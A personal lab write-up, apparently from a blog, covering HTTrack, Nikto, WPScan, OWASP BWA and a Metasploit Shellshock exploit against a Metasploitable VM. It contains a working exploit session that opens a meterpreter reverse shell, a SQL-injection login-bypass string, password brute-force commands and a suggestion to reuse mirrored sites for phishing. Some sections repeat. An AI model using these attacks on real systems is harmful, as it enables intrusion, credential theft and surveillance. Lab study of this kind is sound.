Injection attacks occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing that the request came from the web server. The most common form of this attack is the SQL injection attack, which exploits web applications to send unauthorized commands to a backend database server. Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.
HTTrack
HTTrack allows users to copy or "mirror" websites from the Internet to a local computer. It can be downloaded as a standalone tool or download (and install) in Kali using the apt-get install command.
Open terminal in Kali > type apt-get install webhttrack > type y and press Enter to continue
After installation is done, type webhttrack > press Enter.
Choose a Language preference > click Next.
Type a New project name > click Next.
Type the Web Address or URL > click Next.
Try2hack.nl is a website that you can freely hack online and contains challenges or levels in breaking their website.
Leave the default setting > click Start.
Click Browse Mirrored Website
The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl
You can perform offline web server attacks (view the source code) or modify the website and use it for social engineering attacks (phishing scam).
Web Server (Apache) Attack
Press Enter (or type a new file name).
Make the file as executable using chmod
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh
I made a test by opening a web browser on my Windows 10 machine and typed the URL 192.168.1.120/cgi-bin/web.sh
Enable the SQL database and launch Metasploit Framework console.
Nikto
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items such as dangerous files/programs, checks for outdated server versions. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
OWASP Broken Web Application (BWA)
OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.
Right-click on the VM > Settings > Network Adapter > choose Custom: Specific virtual network > VMnet0
I renamed the VM to BWAPP. Click Power ON (green arrow icon). Type the login: root/owaspbwa (already displayed)
I changed the BWAPP VM IP address to 192.168.1.140/24 using the command: ifconfig eth0 192.168.1.140 netmask 255.255.255.0
I've HTTP to BWAPP from Windows 7 machine using the new IP address (192.168.1.140). Click on OWASP Mutillidae II
Hover to OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login
To view hints or the steps in performing SQL Injection attacks, click Toggle Hints > Authentication Bypass.
Noticed the status became User Authenticated and there's a Logged In Admin called admin
WordPress Scan (WPScan)
WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.
HTTrack
HTTrack allows users to copy or "mirror" websites from the Internet to a local computer. It can be downloaded as a standalone tool or download (and install) in Kali using the apt-get install command.
Open terminal in Kali > type apt-get install webhttrack > type y and press Enter to continue
After installation is done, type webhttrack > press Enter.
Choose a Language preference > click Next.
Type a New project name > click Next.
Type the Web Address or URL > click Next.
Try2hack.nl is a website that you can freely hack online and contains challenges or levels in breaking their website.
Leave the default setting > click Start.
Click Browse Mirrored Website
The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl
You can perform offline web server attacks (view the source code) or modify the website and use it for social engineering attacks (phishing scam).
Web Server (Apache) Attack
I used the Metaspoitable2 VM to act as a web (Apache) server and typed the echo commands in nano editor.
msfadmin@metasploitable:~$
cd /usr/lib/cgi-bin
msfadmin@metasploitable:/usr/lib/cgi-bin$
sudo nano web.sh
[sudo]
password for msfadmin: <msfadmin>
Type the
echo commands > once finished hit Ctrl-X to exit > press y.
Press Enter (or type a new file name).
Make the file as executable using chmod
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh
I made a test by opening a web browser on my Windows 10 machine and typed the URL 192.168.1.120/cgi-bin/web.sh
Enable the SQL database and launch Metasploit Framework console.
root@kali:~#
service postgresql start
root@kali:~#
msfconsole
[*]
Starting the Metasploit Framework consOle...-
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v4.17.11-dev ]
+ -- --=[
1807 exploits - 1028 auxiliary - 313 post
]
+ -- --=[
539 payloads - 42 encoders - 10 nops
]
+ -- --=[
Free Metasploit Pro trial: http://r-7.co/trymsp
]
Set
the options or parameters for the web server/Apache exploit or attack payload.
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.110
LHOST
=> 192.168.1.110
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.120
RHOST
=> 192.168.1.120
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/web.sh
TARGETURI
=> /cgi-bin/web.sh
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload
=> linux/x86/meterpreter/reverse_tcp
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module
options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required
Description
---- --------------- --------
-----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes
CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes
HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format
type:host:port[,type:host:port][...]
RHOST 192.168.1.120 yes
The target address
RPATH /bin yes Target PATH for binaries used by the
CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing
connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
TARGETURI /cgi-bin/web.sh yes
Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit
(default is random)
VHOST no HTTP server virtual host
Payload
options (linux/x86/meterpreter/reverse_tcp):
Name
Current Setting Required Description
----
--------------- -------- -----------
LHOST
192.168.1.110 yes The listen address (an interface may be
specified)
LPORT
4444 yes The listen port
Exploit
target:
Id
Name
--
----
0
Linux x86
Launch
the Apache exploit to the remote target MSPLOIT VM (192.168.1.120).
msf
exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*]
Started reverse TCP handler on 192.168.1.110:4444
[*]
Command Stager progress - 100.46% done (1097/1092 bytes)
[*]
Sending stage (861480 bytes) to 192.168.1.120
[*] Meterpreter session 1 opened (192.168.1.110:4444
-> 192.168.1.120:49667) at 2018-10-30 04:53:34 -0400
meterpreter
> help
Core
Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background
meterpreter script
bglist Lists running background
scripts
bgrun Executes a meterpreter
script as a background thread
channel Displays information or
control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter
session
get_timeouts Get the current session timeout
values
guid Get the session GUID
help Help menu
info Displays information
about a Post module
irb Drop into irb scripting
mode
load Load one or more
meterpreter extensions
machine_id Get the MSF ID of the machine
attached to the session
migrate Migrate the server to
another process
quit Terminate the meterpreter
session
read Reads data from a channel
resource Run the commands stored in a
file
run Executes a meterpreter
script or Post module
sessions Quickly switch to another
session
set_timeouts Set the current session timeout
values
sleep Force Meterpreter to go
quiet, then re-establish session.
transport Change the current transport
mechanism
use Deprecated alias for
"load"
uuid Get the UUID for the
current session
write Writes data to a channel
Stdapi:
File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the
screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Stdapi:
Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the
target
route View and modify the routing table
Stdapi:
System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable
values
getpid Get the current process identifier
getuid Get the user that the server is running
as
kill Terminate a process
localtime Displays the target system's local date
and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote
system, such as OS
Stdapi:
Webcam Commands
=======================
Command Description
------- -----------
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi:
Mic Commands
====================
Command Description
------- -----------
listen listen to a saved audio recording via
audio player
mic_list list all microphone interfaces
mic_start start capturing an audio stream from the
target mic
mic_stop stop capturing audio
Stdapi:
Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system,
nothing written on disk
You
can gather the machine's info using the shell commands available from the help option.
meterpreter
> sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux
2.6.24-16-server)
Architecture
: i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter
> ifconfig
Interface 1
============
Name : lo
Hardware
MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4
Address : 127.0.0.1
IPv4
Netmask : 255.0.0.0
IPv6
Address : ::1
IPv6
Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware
MAC : 00:0c:29:fa:dd:2a
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4
Address : 192.168.1.120
IPv4
Netmask : 255.255.255.0
IPv6
Address : fe80::20c:29ff:fefa:dd2a
IPv6
Netmask : ffff:ffff:ffff:ffff::
meterpreter
> shell
Process
30362 created.
Channel 1
created.
pwd
/usr/lib/cgi-bin
ls
php
php5
web.sh
Nikto
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items such as dangerous files/programs, checks for outdated server versions. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
root@kali:~#
nikto
- Nikto
v2.1.6
---------------------------------------------------------------------------
+ ERROR:
No host specified
-config+ Use this config file
-Display+ Turn on/off display outputs
-dbcheck check database and other key files
for syntax errors
-Format+ save file (-o) format
-Help Extended help information
-host+ target host
-id+ Host authentication to use,
format is id:pass or id:pass:realm
-list-plugins List all available plugins
-output+ Write output to this file
-nossl Disables using SSL
-no404 Disables 404 checks
-Plugins+ List of plugins to run (default:
ALL)
-port+ Port to use (default 80)
-root+ Prepend root value to all
requests, format is /directory
-ssl Force ssl mode on port
-Tuning+ Scan tuning
-timeout+ Timeout for requests (default 10
seconds)
-update Update databases and plugins from
CIRT.net
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value
Note: This is the short help output.
Use -H for full help text.
root@kali:~#
root@kali:~#
nikto -host 192.168.1.120 // MSPLOIT2 VM
- Nikto
v2.1.6
---------------------------------------------------------------------------
+ Target
IP: 192.168.1.120
+ Target
Hostname: 192.168.1.120
+ Target
Port: 80
+ Start
Time: 2018-11-05 22:32:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+
Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The
anti-clickjacking X-Frame-Options header is not present.
+ The
X-XSS-Protection header is not defined. This header can hint to the user agent
to protect against some forms of XSS
+ The
X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type
+
Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache
2.0.65 (final release) and 2.2.29 are also current.
+
Uncommon header 'tcn' found, with contents: list
+ Apache
mod_negotiation is enabled with MultiViews, which allows attackers to easily
brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.
The following alternatives for 'index' were found: index.php
+ Web
Server returns a valid response with junk HTTP methods, this may cause false
positives.
+
OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to
XST
+
/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output
from the phpinfo() function was found.
+
OSVDB-3268: /doc/: Directory indexing found.
+
OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+
OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals
potentially sensitive information via certain HTTP requests that contain
specific QUERY strings.
+
OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that contain
specific QUERY strings.
+
OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that contain
specific QUERY strings.
+
OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that contain
specific QUERY strings.
+
OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ Server
leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode:
92462, size: 40540, mtime: Tue Dec 9
12:24:00 2008
+
OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases,
and should be protected or limited to authorized hosts.
+
OSVDB-3268: /test/: Directory indexing found.
+
OSVDB-3092: /test/: This might be interesting...
+
/phpinfo.php: Output from the phpinfo() function was found.
+
OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs
phpinfo() was found. This gives a lot of system information.
+
OSVDB-3268: /icons/: Directory indexing found.
+
/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>:
Output from the phpinfo() function was found.
+
/phpinfo.php?cx[]=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<script>alert(foo)</script>:
Output from the phpinfo() function was found.
+
OSVDB-3233: /icons/README: Apache default file found.
+
/phpMyAdmin/: phpMyAdmin directory found
+
OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ 8347
requests: 0 error(s) and 29 item(s) reported on remote host
+ End
Time: 2018-11-05 22:33:23
(GMT-5) (31 seconds)
---------------------------------------------------------------------------
+ 1
host(s) tested
OWASP Broken Web Application (BWA)
OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.
Download
and extract the OWASP Broken Web Application. Double-click on the VMWare
configuration file (2 KB).
Right-click on the VM > Settings > Network Adapter > choose Custom: Specific virtual network > VMnet0
I renamed the VM to BWAPP. Click Power ON (green arrow icon). Type the login: root/owaspbwa (already displayed)
I changed the BWAPP VM IP address to 192.168.1.140/24 using the command: ifconfig eth0 192.168.1.140 netmask 255.255.255.0
I've HTTP to BWAPP from Windows 7 machine using the new IP address (192.168.1.140). Click on OWASP Mutillidae II
Hover to OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login
To view hints or the steps in performing SQL Injection attacks, click Toggle Hints > Authentication Bypass.
Type Username ' 'a' = 'a' --
There's a
"space" after --
Noticed the status became User Authenticated and there's a Logged In Admin called admin
WordPress Scan (WPScan)
WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.
root@kali:~#
wpscan
_______________________________________________________________
__ _______ _____
\ \ / /
__ \ / ____|
\ \
/\ / /| |__) | (___ ___
__ _ _ __ ®
\ \/
\/ / | ___/ \___ \ / __|/ _` | '_
\
\
/\ / | |
____) | (__| (_| | | | |
\/
\/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the
WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr,
@_FireFart_
_______________________________________________________________
Examples
:
-Further
help ...
wpscan
--help
-Do
'non-intrusive' checks ...
wpscan
--url www.example.com
-Do
wordlist password brute force on enumerated users using 50 threads ...
wpscan
--url www.example.com --wordlist
darkc0de.lst --threads 50
-Do
wordlist password brute force on the 'admin' username only ...
wpscan
--url www.example.com --wordlist
darkc0de.lst --username admin
-Enumerate
installed plugins ...
wpscan
--url www.example.com --enumerate p
-Enumerate
installed themes ...
wpscan
--url www.example.com --enumerate t
-Enumerate
users (from 1 - 10)...
wpscan
--url www.example.com --enumerate u
-Enumerate
users (from 1 - 20)...
ruby
wpscan --url www.example.com --enumerate
u[1-20]
-Enumerate
installed timthumbs ...
wpscan
--url www.example.com --enumerate tt
-Use a
HTTP proxy ...
wpscan
--url www.example.com --proxy
127.0.0.1:8118
-Use a
SOCKS5 proxy ... (cURL >= v7.21.7 needed)
wpscan
--url www.example.com --proxy
socks5://127.0.0.1:9000
-Use
custom content directory ...
wpscan -u
www.example.com --wp-content-dir
custom-content
-Use
custom plugins directory ...
wpscan -u
www.example.com --wp-plugins-dir
wp-content/custom-plugins
-Update
the Database ...
wpscan
--update
-Debug
output ...
wpscan
--url www.example.com --debug-output
2>debug.log
See
README for further information.
[!] No
argument supplied
_______________________________________________________________
__ _______ _____
\ \ / /
__ \ / ____|
\ \
/\ / /| |__) | (___ ___
__ _ _ __ ®
\ \/
\/ / | ___/ \___ \ / __|/ _` | '_
\
\
/\ / | |
____) | (__| (_| | | | |
\/
\/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the
WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr,
@_FireFart_
_______________________________________________________________
[i] It
seems like you have not updated the database for some time
[?] Do
you want to update now? [Y]es [N]o [A]bort update, default: [N] > y
[i]
Updating the Database ...
[i]
Update completed
root@kali:~#
wpscan --url http://localhost
_______________________________________________________________
__ _______ _____
\ \ / /
__ \ / ____|
\ \
/\ / /| |__) | (___ ___
__ _ _ __ ®
\ \/
\/ / | ___/ \___ \ / __|/ _` | '_
\
\
/\ / | |
____) | (__| (_| | | | |
\/
\/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the
WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr,
@_FireFart_
_______________________________________________________________
[!] The remote website is up, but does not seem to
be running WordPress. If you are sure, use --force
_______________________________________________________________
__ _______ _____
\ \ / /
__ \ / ____|
\ \
/\ / /| |__) | (___ ___
__ _ _ __ ®
\ \/
\/ / | ___/ \___ \ / __|/ _` | '_
\
\
/\ / | |
____) | (__| (_| | | | |
\/
\/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the
WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr,
@_FireFart_
_______________________________________________________________
[+] URL: http://localhost/
[+]
Started: Mon Nov 5 21:30:26 2018
[+]
Interesting header: SERVER: Apache/2.4.35 (Debian)
[!]
Upload directory has directory listing enabled: http://localhost/wp-content/uploads/
[!]
Includes directory has directory listing enabled: http://localhost/wp-includes/
[+]
Enumerating WordPress version ...
[+]
WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced
fingerprinting
[+]
Enumerating installed plugins (only ones marked as popular) ...
Time: 00:00:01
<==================================> (1494 / 1494) 100.00% Time: 00:00:01
[+] We found 1 plugin:
[+] Name: akismet - v4.0.8
|
Latest version: 4.0.8 (up to date)
| Last
updated: 2018-10-30T16:34:00.000Z
[+]
Finished: Mon Nov 5 21:30:32 2018
[+]
Elapsed time: 00:00:06
[+]
Requests made: 1558
[+]
Memory used: 70.914 MB